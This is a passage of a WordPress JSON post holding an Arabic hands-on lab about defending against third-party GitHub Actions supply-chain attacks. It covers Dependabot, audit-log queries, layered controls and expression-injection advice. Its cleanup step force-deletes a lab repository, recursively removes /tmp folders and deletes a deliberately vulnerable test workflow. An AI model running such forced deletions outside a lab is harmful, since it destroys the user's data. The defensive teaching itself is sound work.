\u0630\u0644\u0643:<\/p>\n<ol>\n<li>\u0627\u0630\u0647\u0628 \u0625\u0644\u0649 <strong>\u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639 &rarr; \u0623\u0645\u0627\u0646 \u0627\u0644\u0634\u064a\u0641\u0631\u0629 \u0648\u0627\u0644\u062a\u062d\u0644\u064a\u0644<\/strong><\/li>\n<li>\u0641\u0639\u0651\u0644 <strong>\u062a\u0646\u0628\u064a\u0647\u0627\u062a Dependabot<\/strong><\/li>\n<li>\u0641\u0639\u0651\u0644 <strong>\u062a\u062d\u062f\u064a\u062b\u0627\u062a Dependabot \u0627\u0644\u0623\u0645\u0646\u064a\u0629<\/strong><\/li>\n<\/ol>\n<p>\u0639\u0646\u062f\u0645\u0627 \u062a\u062d\u062a\u0648\u064a action \u0645\u062b\u0628\u062a\u0629 \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0645\u0639\u0631\u0648\u0641\u0629\u060c \u0633\u064a\u0646\u0634\u0626 Dependabot \u0637\u0644\u0628 PR \u0644\u0644\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0623\u0645\u0646\u064a. 
\u0644\u0623\u0646\u0643 \u0645\u062b\u0628\u062a \u0628\u0640 SHA\u060c \u064a\u0638\u0647\u0631 \u0627\u0644\u0641\u0631\u0642 \u0628\u0648\u0636\u0648\u062d \u0647\u0627\u0634\u0627\u062a \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645 \u0627\u0644\u0642\u062f\u064a\u0645\u0629 \u0648\u0627\u0644\u062c\u062f\u064a\u062f\u0629\u060c \u0645\u0645\u0627 \u064a\u0633\u0647\u0651\u0644 \u0645\u0631\u0627\u062c\u0639\u0629 \u0645\u0627 \u062a\u063a\u064a\u0631 \u0628\u0627\u0644\u0636\u0628\u0637.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0645\u0631\u0627\u0642\u0628\u0629 \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 (GitHub Enterprise)<\/h3>\n<p>\u0644\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u062e\u062f\u0645 GitHub Enterprise\u060c \u0641\u0639\u0651\u0644 \u0628\u062b \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u062a\u0639\u062f\u064a\u0644\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644:<\/p>\n<pre><code># \u0627\u0644\u0627\u0633\u062a\u0639\u0644\u0627\u0645 \u0641\u064a \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0639\u0646 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\ngh api orgs\/YOUR_ORG\/audit-log \\\n  --method GET \\\n  -f phrase='action:workflows' \\\n  -f per_page=50 \\\n  --jq '.[] | {actor: .actor, action: .action, repo: .repo, created_at: .created_at}'<\/code><\/pre>\n<h2>\u0628\u0646\u0627\u0621 \u0627\u0633\u062a\u0631\u0627\u062a\u064a\u062c\u064a\u0629 \u0627\u0644\u062f\u0641\u0627\u0639<\/h2>\n<p>\u0644\u064a\u0633\u062a \u0643\u0644 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u062a\u062d\u062a\u0627\u062c \u0643\u0644 \u0639\u0646\u0635\u0631 \u062a\u062d\u0643\u0645. 
\u0625\u0644\u064a\u0643 \u0646\u0647\u062c \u0645\u062a\u062f\u0631\u062c \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u0645\u062a\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643:<\/p>\n<h3>\u0627\u0644\u0645\u0633\u062a\u0648\u0649 1: \u0627\u0644\u062d\u062f \u0627\u0644\u0623\u062f\u0646\u0649 (\u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a)<\/h3>\n<ul>\n<li><strong>\u062b\u0628\u0651\u062a \u062c\u0645\u064a\u0639 \u0627\u0644\u0640 actions \u0628\u0647\u0627\u0634\u0627\u062a SHA \u0627\u0644\u0643\u0627\u0645\u0644\u0629<\/strong> \u2014 \u064a\u0645\u0646\u0639 \u0647\u062c\u0645\u0627\u062a \u062a\u063a\u064a\u064a\u0631 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a<\/li>\n<li><strong>\u0641\u0639\u0651\u0644 Dependabot \u0644\u0640 github-actions<\/strong> \u2014 \u064a\u0624\u062a\u0645\u062a \u062a\u062d\u062f\u064a\u062b\u0627\u062a SHA<\/li>\n<li><strong>\u0627\u0636\u0628\u0637 \u0627\u0644\u062d\u062f \u0627\u0644\u0623\u062f\u0646\u0649 \u0645\u0646 \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a<\/strong> \u2014 \u0627\u0633\u062a\u062e\u062f\u0645 <code>permissions:<\/code> \u0639\u0644\u0649 \u0645\u0633\u062a\u0648\u0649 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0648\u0627\u0644\u0648\u0638\u064a\u0641\u0629<\/li>\n<\/ul>\n<p>\u0627\u0644\u062c\u0647\u062f: \u0645\u0646\u062e\u0641\u0636. 
\u0627\u0644\u0623\u062b\u0631: \u064a\u062d\u062c\u0628 \u0646\u0627\u0642\u0644 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0623\u0643\u062b\u0631 \u0634\u064a\u0648\u0639\u064b\u0627 (\u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631).<\/p>\n<h3>\u0627\u0644\u0645\u0633\u062a\u0648\u0649 2: \u0627\u0644\u0645\u0648\u0635\u0649 \u0628\u0647 (\u0645\u0639\u0638\u0645 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a)<\/h3>\n<p>\u0643\u0644 \u0645\u0627 \u0641\u064a \u0627\u0644\u0645\u0633\u062a\u0648\u0649 1\u060c \u0628\u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649:<\/p>\n<ul>\n<li><strong>\u062a\u0634\u063a\u064a\u0644 actionlint \u0648zizmor \u0641\u064a CI<\/strong> \u2014 \u064a\u0643\u062a\u0634\u0641 \u062b\u063a\u0631\u0627\u062a \u0627\u0644\u062d\u0642\u0646 \u0648\u0623\u062e\u0637\u0627\u0621 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0642\u0628\u0644 \u062f\u0645\u062c\u0647\u0627<\/li>\n<li><strong>\u0625\u0639\u062f\u0627\u062f CODEOWNERS \u0644\u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/strong> \u2014 \u064a\u0636\u0645\u0646 \u0645\u0631\u0627\u062c\u0639\u0629 \u0641\u0631\u064a\u0642 \u0627\u0644\u0623\u0645\u0627\u0646 \u0644\u062c\u0645\u064a\u0639 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/li>\n<li><strong>\u062a\u0641\u0639\u064a\u0644 \u0642\u0648\u0627\u0639\u062f \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0641\u0631\u0639<\/strong> \u2014 \u0637\u0644\u0628 \u0641\u062d\u0648\u0635\u0627\u062a \u0627\u0644\u062d\u0627\u0644\u0629 \u0648\u0645\u0631\u0627\u062c\u0639\u0627\u062a \u0645\u0627\u0644\u0643\u064a \u0627\u0644\u0634\u064a\u0641\u0631\u0629<\/li>\n<\/ul>\n<p>\u0627\u0644\u062c\u0647\u062f: \u0645\u062a\u0648\u0633\u0637. 
\u0627\u0644\u0623\u062b\u0631: \u064a\u0643\u062a\u0634\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0623\u062b\u0646\u0627\u0621 \u0627\u0644\u062a\u0637\u0648\u064a\u0631 \u0648\u064a\u0636\u0645\u0646 \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629.<\/p>\n<h3>\u0627\u0644\u0645\u0633\u062a\u0648\u0649 3: \u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0639\u0627\u0644\u064a (\u0627\u0644\u0635\u0646\u0627\u0639\u0627\u062a \u0627\u0644\u0645\u0646\u0638\u0645\u0629\u060c \u0627\u0644\u0623\u0647\u062f\u0627\u0641 \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u0642\u064a\u0645\u0629)<\/h3>\n<p>\u0643\u0644 \u0645\u0627 \u0641\u064a \u0627\u0644\u0645\u0633\u062a\u0648\u0649 2\u060c \u0628\u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649:<\/p>\n<ul>\n<li><strong>\u0641\u0631\u0636 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0644\u0644\u0640 actions<\/strong> \u2014 \u0641\u0642\u0637 \u0627\u0644\u0640 actions \u0627\u0644\u0645\u0639\u062a\u0645\u062f\u0629 \u0645\u0633\u0628\u0642\u064b\u0627 \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627<\/li>\n<li><strong>\u062a\u062f\u0642\u064a\u0642 \u0623\u0645\u0646\u064a \u064a\u062f\u0648\u064a \u0644\u0643\u0644 action \u062c\u062f\u064a\u062f\u0629<\/strong> \u2014 \u0645\u0631\u0627\u062c\u0639\u0629 \u0643\u0627\u0645\u0644\u0629 \u0644\u0644\u0634\u064a\u0641\u0631\u0629 \u0642\u0628\u0644 \u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0627\u0644\u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0628\u064a\u0636\u0627\u0621<\/li>\n<li><strong>\u0646\u0633\u062e \u0627\u0644\u0640 actions \u0627\u0644\u062d\u0631\u062c\u0629 \u062f\u0627\u062e\u0644\u064a\u064b\u0627<\/strong> \u2014 \u0627\u0644\u062d\u0641\u0627\u0638 \u0639\u0644\u0649 \u0646\u0633\u062e\u0643 \u0627\u0644\u062e\u0627\u0635\u0629 \u0645\u0646 \u0627\u0644\u0640 actions \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629 \u0644\u0625\u0632\u0627\u0644\u0629 
\u0627\u0644\u062a\u0628\u0639\u064a\u0629 \u0627\u0644\u062e\u0627\u0631\u062c\u064a\u0629<\/li>\n<li><strong>\u062a\u0642\u0627\u0631\u064a\u0631 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0622\u0644\u064a\u0629<\/strong> \u2014 \u062a\u0639\u0644\u064a\u0642\u0627\u062a PR \u062a\u0644\u062e\u0635 \u062c\u0645\u064a\u0639 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0627\u0644\u0640 actions<\/li>\n<li><strong>\u0645\u0631\u0627\u0642\u0628\u0629 \u0633\u062c\u0644 \u0627\u0644\u062a\u062f\u0642\u064a\u0642<\/strong> \u2014 \u062a\u0646\u0628\u064a\u0647\u0627\u062a \u0641\u0648\u0631\u064a\u0629 \u0639\u0646\u062f \u062a\u0639\u062f\u064a\u0644 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/li>\n<\/ul>\n<p>\u0627\u0644\u062c\u0647\u062f: \u0639\u0627\u0644\u064a. \u0627\u0644\u0623\u062b\u0631: \u062f\u0641\u0627\u0639 \u0634\u0627\u0645\u0644 \u0636\u062f \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0645\u0646 \u062e\u0644\u0627\u0644 Actions.<\/p>\n<h2>\u0627\u0644\u062a\u0646\u0638\u064a\u0641<\/h2>\n<p>\u0628\u0639\u062f \u0625\u0643\u0645\u0627\u0644 \u0627\u0644\u0645\u062e\u062a\u0628\u0631\u060c \u0646\u0638\u0651\u0641 \u0623\u064a \u0645\u0648\u0627\u0631\u062f \u0627\u062e\u062a\u0628\u0627\u0631:<\/p>\n<pre><code># \u062d\u0630\u0641 \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0630\u0627 \u0623\u0646\u0634\u0623\u062a \u0648\u0627\u062d\u062f\u064b\u0627\ngh repo delete actions-security-lab --yes\n\n# \u062d\u0630\u0641 \u0645\u062c\u0644\u062f\u0627\u062a \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0627\u0644\u0645\u0633\u062a\u0646\u0633\u062e\u0629\nrm -rf \/tmp\/audit-checkout \/tmp\/audit-setup-node \/tmp\/audit-cache\n\n# \u0625\u0632\u0627\u0644\u0629 \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0623\u062f\u0648\u0627\u062a 
\u0625\u0630\u0627 \u0644\u0645 \u062a\u0639\u062f \u0645\u0637\u0644\u0648\u0628\u0629\n# brew uninstall actionlint\n# pip uninstall zizmor<\/code><\/pre>\n<p>\u0625\u0630\u0627 \u0627\u0633\u062a\u062e\u062f\u0645\u062a \u0645\u0633\u062a\u0648\u062f\u0639\u0643 \u0627\u0644\u062e\u0627\u0635\u060c \u0627\u0631\u062c\u0639 \u0639\u0646 \u0623\u064a \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0645\u0644 \u0627\u062e\u062a\u0628\u0627\u0631 \u0636\u0639\u064a\u0641\u0629:<\/p>\n<pre><code>git checkout main\ngit branch -D test-unapproved-action\nrm -f .github\/workflows\/greet-pr.yml<\/code><\/pre>\n<h2>\u0627\u0644\u0646\u0642\u0627\u0637 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629<\/h2>\n<ul>\n<li><strong>GitHub Actions \u0645\u0646 \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u062a\u0645\u062b\u0644 \u062e\u0637\u0631\u064b\u0627 \u0639\u0644\u0649 \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f.<\/strong> \u0643\u0644 \u062a\u0648\u062c\u064a\u0647 <code>uses:<\/code> \u064a\u0646\u0641\u0630 \u0634\u064a\u0641\u0631\u0629 \u062e\u0627\u0631\u062c\u064a\u0629 \u0641\u064a \u0628\u064a\u0626\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643 \u0645\u0639 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0623\u0633\u0631\u0627\u0631\u0643 \u0648\u0631\u0645\u0648\u0632\u0643 \u0627\u0644\u0645\u0645\u064a\u0632\u0629.<\/li>\n<li><strong>\u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0647\u064a \u0627\u0644\u0633\u0628\u0628 \u0627\u0644\u062c\u0630\u0631\u064a \u0644\u0645\u0639\u0638\u0645 \u0627\u062e\u062a\u0631\u0627\u0642\u0627\u062a \u0627\u0644\u0640 actions.<\/strong> \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0647\u0627\u0634\u0627\u062a SHA \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u064a\u0632\u064a\u0644 \u0647\u062c\u0645\u0627\u062a \u062a\u063a\u064a\u064a\u0631 
\u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a\u060c \u0648\u0647\u064a \u0646\u0627\u0642\u0644 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0623\u0643\u062b\u0631 \u0634\u064a\u0648\u0639\u064b\u0627.<\/li>\n<li><strong>\u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a \u0647\u0648 \u0623\u0643\u062b\u0631 \u062b\u063a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0627\u0646\u062a\u0634\u0627\u0631\u064b\u0627.<\/strong> \u0644\u0627 \u062a\u064f\u062f\u0631\u062c \u0623\u0628\u062f\u064b\u0627 \u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629 (\u0639\u0646\u0627\u0648\u064a\u0646 PR\u060c \u0623\u0633\u0645\u0627\u0621 \u0627\u0644\u0641\u0631\u0648\u0639\u060c \u0631\u0633\u0627\u0626\u0644 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645) \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0643\u062a\u0644 <code>run:<\/code> \u2014 \u0627\u0633\u062a\u062e\u062f\u0645 \u062f\u0627\u0626\u0645\u064b\u0627 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629.<\/li>\n<li><strong>\u0627\u0644\u0641\u062d\u0635 \u0627\u0644\u0622\u0644\u064a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 actionlint \u0648zizmor \u064a\u0643\u062a\u0634\u0641 \u0645\u0627 \u062a\u0641\u0648\u062a\u0647 \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629 \u0627\u0644\u064a\u062f\u0648\u064a\u0629.<\/strong> \u0627\u0633\u062a\u062e\u062f\u0645 \u0643\u0644\u062a\u0627 \u0627\u0644\u0623\u062f\u0627\u062a\u064a\u0646 \u0641\u064a \u062e\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI \u0627\u0644\u062e\u0627\u0635 \u0628\u0643 \u2014 actionlint \u0644\u0644\u0635\u062d\u0629 \u0648\u0627\u0644\u0623\u0645\u0627\u0646 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u060c \u0648zizmor \u0644\u0644\u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0623\u0645\u0646\u064a 
\u0627\u0644\u0639\u0645\u064a\u0642.<\/li>\n<li><strong>\u0627\u0644\u062f\u0641\u0627\u0639 \u0627\u0644\u0639\u0645\u064a\u0642 \u0636\u0631\u0648\u0631\u064a.<\/strong> \u0644\u0627 \u064a\u0643\u0641\u064a \u0639\u0646\u0635\u0631 \u062a\u062d\u0643\u0645 \u0648\u0627\u062d\u062f. \u0627\u062f\u0645\u062c \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0648\u0627\u0644\u0641\u062d\u0635 \u0648\u0627\u0644\u0642\u0648\u0627\u0626\u0645 \u0627\u0644\u0628\u064a\u0636\u0627\u0621 \u0648CODEOWNERS \u0648\u0627\u0644\u0645\u0631\u0627\u0642\u0628\u0629 \u0644\u062d\u0645\u0627\u064a\u0629 \u0634\u0627\u0645\u0644\u0629.<\/li>\n<li><strong>\u0639\u0627\u0645\u0644 \u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0643\u0634\u064a\u0641\u0631\u0629 \u0625\u0646\u062a\u0627\u062c.<\/strong> \u062a\u0633\u062a\u062d\u0642 \u0646\u0641\u0633 \u0639\u0645\u0644\u064a\u0627\u062a \u0627\u0644\u0645\u0631\u0627\u062c\u0639\u0629 \u0648\u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0648\u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062a\u063a\u064a\u064a\u0631 \u0643\u0634\u064a\u0641\u0631\u0629 \u062a\u0637\u0628\u064a\u0642\u0643.<\/li>\n<\/ul>\n<h2>\u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629<\/h2>\n<p>\u0648\u0627\u0635\u0644 \u0628\u0646\u0627\u0621 \u0645\u0639\u0631\u0641\u062a\u0643 \u0628\u0623\u0645\u0627\u0646 CI\/CD \u0645\u0639 \u0647\u0630\u0647 \u0627\u0644\u0623\u062f\u0644\u0629 \u0630\u0627\u062a \u0627\u0644\u0635\u0644\u0629:<\/p>\n<ul>\n<li><a href=\"\/ar\/ci-cd-security\/defensive-patterns-mitigations-ci-cd-pipeline-attacks\/\">\u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u062f\u0641\u0627\u0639\u064a\u0629 \u0648\u0627\u0644\u062a\u062e\u0641\u064a\u0641\u0627\u062a \u0644\u0647\u062c\u0645\u0627\u062a \u062e\u0637\u0648\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI\/CD<\/a> \u2014 \u062a\u0639\u0644\u0651\u0645 
\u0627\u0633\u062a\u0631\u0627\u062a\u064a\u062c\u064a\u0627\u062a \u062f\u0641\u0627\u0639\u064a\u0629 \u0623\u0648\u0633\u0639 \u0644\u062d\u0645\u0627\u064a\u0629 \u062e\u0637 \u0623\u0646\u0627\u0628\u064a\u0628 CI\/CD \u0628\u0627\u0644\u0643\u0627\u0645\u0644 \u0628\u0645\u0627 \u064a\u062a\u062c\u0627\u0648\u0632 GitHub Actions \u0641\u0642\u0637.<\/li>\n<li><a href=\"\/ar\/ci-cd-security\/ci-cd-execution-models-trust-assumptions-security-guide\/\">\u0646\u0645\u0627\u0630\u062c \u062a\u0646\u0641\u064a\u0630 CI\/CD \u0648\u0627\u0641\u062a\u0631\u0627\u0636\u0627\u062a \u0627\u0644\u062b\u0642\u0629<\/a> \u2014 \u0641\u0647\u0645 \u062d\u062f\u0648\u062f \u0627\u0644\u062b\u0642\u0629 \u0648\u0646\u0645\u0627\u0630\u062c \u0627\u0644\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062a\u064a \u062a\u062f\u0639\u0645 \u0623\u0645\u0627\u0646 CI\/CD\u060c \u0648\u0643\u064a\u0641\u064a\u0629 \u062a\u0635\u0645\u064a\u0645 \u062e\u0637\u0648\u0637 \u0627\u0644\u0623\u0646\u0627\u0628\u064a\u0628 \u0628\u0627\u0641\u062a\u0631\u0627\u0636\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646 \u0623\u0648\u0644\u0627\u064b.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629 \u062a\u064f\u0639\u062f GitHub Actions \u0645\u0646 \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0623\u0643\u062b\u0631 \u0627\u0644\u0645\u064a\u0632\u0627\u062a \u0645\u0644\u0627\u0621\u0645\u0629 \u0641\u064a \u0646\u0638\u0627\u0645 GitHub. 
\u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062a\u0648\u062c\u064a\u0647 uses: \u0648\u0627\u062d\u062f\u060c \u064a\u0645\u0643\u0646\u0643 \u0627\u0633\u062a\u064a\u0631\u0627\u062f \u0645\u0646\u0637\u0642 \u0628\u0646\u0627\u0621 \u0645\u0639\u0642\u062f\u060c \u0623\u0648 \u0627\u0644\u0646\u0634\u0631 \u0639\u0644\u0649 \u0645\u0632\u0648\u062f\u064a \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0633\u062d\u0627\u0628\u064a\u0629\u060c \u0623\u0648 \u062a\u0634\u063a\u064a\u0644 \u0623\u062f\u0648\u0627\u062a \u0627\u0644\u0641\u062d\u0635 \u0627\u0644\u0623\u0645\u0646\u064a. \u0644\u0643\u0646 \u0647\u0630\u0647 \u0627\u0644\u0631\u0627\u062d\u0629 \u062a\u0623\u062a\u064a \u0645\u0639 \u0645\u0642\u0627\u064a\u0636\u0629 \u062d\u0631\u062c\u0629: \u0643\u0644 action \u0645\u0646 \u0637\u0631\u0641 \u062b\u0627\u0644\u062b \u062a\u0646\u0641\u0630 \u0634\u064a\u0641\u0631\u0629 \u0628\u0631\u0645\u062c\u064a\u0629 \u0641\u064a \u0628\u064a\u0626\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643 \u0645\u0639 \u0625\u0645\u0643\u0627\u0646\u064a\u0629 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0623\u0633\u0631\u0627\u0631\u0643 
&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,29,31],"tags":[],"post_folder":[],"class_list":["post-828","post","type-post","status-publish","format-standard","hentry","category-ci-cd-security","category-github-actions","category-threats-attacks"],"_links":{"self":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/comments?post=828"}],"version-history":[{"count":0,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/828\/revisions"}],"wp:attachment":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/media?parent=828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/categories?post=828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/tags?post=828"},{"taxonomy":"post_folder","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/post_folder?post=828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}